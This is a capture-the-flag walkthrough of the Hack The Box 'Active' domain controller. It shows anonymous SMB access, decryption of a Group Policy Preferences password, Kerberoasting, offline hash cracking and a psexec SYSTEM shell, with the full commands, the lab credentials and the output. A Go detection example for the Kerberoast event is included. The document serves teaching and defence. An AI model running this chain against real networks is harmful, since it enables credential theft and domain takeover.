Active

Last updated 2 years ago

Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.100 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn skip host discovery and assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result to a file, in this case the allPorts file.

# Nmap 7.92 scan initiated Fri Jun 17 14:00:41 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.100
Host is up (0.061s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49168/tcp open  unknown
49169/tcp open  unknown

# Nmap done at Fri Jun 17 14:01:09 2022 -- 1 IP address (1 host up) scanned in 28.29 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49168,49169 10.10.10.100 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result to a file, in this case the targeted file.

# Nmap 7.92 scan initiated Fri Jun 17 14:04:24 2022 as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49168,49169 -oN targeted 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.054s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-06-17 12:04:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-06-17T12:05:28
|_  start_date: 2022-06-17T11:04:54
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 17 14:05:38 2022 -- 1 IP address (1 host up) scanned in 73.62 seconds

First, let's add the domain active.htb to the /etc/hosts file.

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
10.10.10.100    active.htb

Let's try to list the SMB shares.

smbclient -L 10.10.10.100 -N

  • -L get a list of shares available on the host.

  • -N use a null session, i.e. do not ask for a password.

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Exploitation

Let's look inside the Replication share, which is readable anonymously. Inside it we find the active.htb directory.

smbclient \\\\10.10.10.100\\Replication -N

  • -N use a null session, i.e. do not ask for a password.

Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 12:37:44 2018
  ..                                  D        0  Sat Jul 21 12:37:44 2018
  active.htb                          D        0  Sat Jul 21 12:37:44 2018

                5217023 blocks of size 4096. 284357 blocks available

Inside this share, under \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\, you'll find the Groups.xml file. After changing into that directory, download it:

get Groups.xml

getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (3.3 KiloBytes/sec) (average 3.3 KiloBytes/sec)

This file is a Group Policy Preferences item that creates a local user; it contains a username (active.htb\SVC_TGS) and an encrypted password.

cat Groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The cpassword attribute holds the password encrypted with AES-256, but Microsoft published the key in its MS-GPPREF documentation, so anyone who can read SYSVOL can decrypt it. The gpp-decrypt tool does exactly that.

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

GPPstillStandingStrong2k18

Now let's check whether these credentials are valid with crackmapexec.

crackmapexec smb 10.10.10.100 -u "SVC_TGS" -p "GPPstillStandingStrong2k18"

  • -u username.

  • -p password.

SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18

Privilege Escalation

The credentials are valid. With a domain account in hand, we can try a Kerberoasting attack: request a service ticket (TGS) for every account that has an SPN and crack it offline. Let's do it with the impacket tool GetUserSPNs.

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

  • -request request a TGS for each user that has an SPN and print it in a crackable format.

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2022-06-17 22:43:42.386142             

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$273c8852f5c2beda983d2f85ef9893d3$…
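From the domain controller's side, the GetUserSPNs request above is recorded as Windows event 4769 with ticket encryption type 0x17 (RC4), the etype 23 in the hash. The Go code below is an added example, not part of the write-up, that runs a simple Kerberoast detection over constructed 4769 lines; the flat key=value line format and the sample lines are assumptions made for the example.

```go
package main

import "strings"

// Event4769: the fields of Windows event 4769 (service ticket requested) used here.
type Event4769 struct {
	Requester string // TargetUserName: the account that asked for the ticket
	Service   string // ServiceName: the account that owns the requested SPN
	EncType   string // TicketEncryptionType: 0x17 = RC4-HMAC, 0x12 = AES256-CTS
}

// ParseEvent4769 reads one flattened "Key=Value; Key=Value" line; real events arrive as
// EVTX/XML, so the flat form is an assumption of this example.
func ParseEvent4769(line string) Event4769 {
	var e Event4769
	fields := map[string]*string{"TargetUserName": &e.Requester, "ServiceName": &e.Service, "TicketEncryptionType": &e.EncType}
	for _, kv := range strings.Split(line, ";") {
		if p := strings.SplitN(strings.TrimSpace(kv), "=", 2); len(p) == 2 && fields[p[0]] != nil {
			*fields[p[0]] = p[1]
		}
	}
	return e
}

// Roastable flags a Kerberoast-shaped 4769: an RC4 ticket (etype 23, the $krb5tgs$23$
// format cracked below) for a user's SPN rather than for a machine account ("$") or krbtgt.
func Roastable(e Event4769) bool {
	return strings.EqualFold(e.EncType, "0x17") && !strings.HasSuffix(e.Service, "$") && !strings.EqualFold(e.Service, "krbtgt")
}

// KerberoastSuspects lists, per requester, each service account it pulled an RC4 ticket
// for; one account collecting several such tickets quickly is the bulk-Kerberoast pattern.
func KerberoastSuspects(lines []string) map[string][]string {
	out, seen := map[string][]string{}, map[string]bool{}
	for _, l := range lines {
		if e := ParseEvent4769(l); Roastable(e) && !seen[e.Requester+"\x00"+e.Service] {
			seen[e.Requester+"\x00"+e.Service] = true
			out[e.Requester] = append(out[e.Requester], e.Service)
		}
	}
	return out
}

// SampleEvents are constructed lines modelled on this box, mixed with routine traffic.
var SampleEvents = []string{
	"TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=Administrator; TicketEncryptionType=0x17",
	"TargetUserName=DC$@ACTIVE.HTB; ServiceName=DC$; TicketEncryptionType=0x12",
	"TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=krbtgt; TicketEncryptionType=0x12",
	"TargetUserName=SVC_TGS@ACTIVE.HTB; ServiceName=Administrator; TicketEncryptionType=0x17",
}
```

The durable fix is on the service-account side: long random passwords or gMSAs, and AES-only encryption types so that RC4 tickets are never issued for them.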

Now, let's save the Administrator TGS hash in a file called hash and crack it with john.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:01:17 DONE (2022-06-17 23:33) 0.01293g/s 136354p/s 136354c/s 136354C/s Tiffani1432..Tiago_18
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

And we get the password Ticketmaster1968 for the Administrator user. Now all we have to do is get a shell with impacket's psexec tool, reap the harvest and take both the user and root flags.

impacket-psexec active.htb/administrator:Ticketmaster1968@10.10.10.100

Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file RDplSnin.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service tAJu on 10.10.10.100.....
[*] Starting service tAJu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type \users\SVC_TGS\desktop\user.txt
91ff89ca32631212e8a2e6ad27b1b961

C:\Windows\system32> type \users\administrator\desktop\root.txt
d8cb0dfdd2cbbc3d8125ec3b56a158c3